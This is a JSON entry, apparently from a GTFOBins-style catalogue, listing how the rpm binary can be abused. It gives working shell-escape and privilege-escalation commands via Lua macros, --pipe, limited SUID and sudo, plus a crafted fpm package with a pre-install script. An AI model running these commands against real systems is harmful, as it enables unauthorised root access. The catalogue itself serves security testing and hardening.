You cannot select more than 25 topics
Topics must start with a letter or number, can include dashes ('-') and can be up to 35 characters long.
27 lines
744 B
JSON
27 lines
744 B
JSON
{
|
|
"functions": {
|
|
"shell": [
|
|
{
|
|
"code": "rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
|
|
},
|
|
{
|
|
"code": "rpm --pipe '/bin/sh 0<&1'"
|
|
}
|
|
],
|
|
"limited-suid": [
|
|
{
|
|
"code": "./rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
|
|
}
|
|
],
|
|
"sudo": [
|
|
{
|
|
"code": "sudo rpm --eval '%{lua:os.execute(\"/bin/sh\")}'"
|
|
},
|
|
{
|
|
"description": "It runs commands using a specially crafted RPM package. Generate it with 'https://github.com/jordansissel/fpm' and upload it to the target.\n```\nTF=$(mktemp -d)\necho 'id' > $TF/x.sh\nfpm -n x -s dir -t rpm -a all --before-install $TF/x.sh $TF\n```",
|
|
"code": "sudo rpm -ivh x-1.0-1.noarch.rpm\n"
|
|
}
|
|
]
|
|
}
|
|
}
|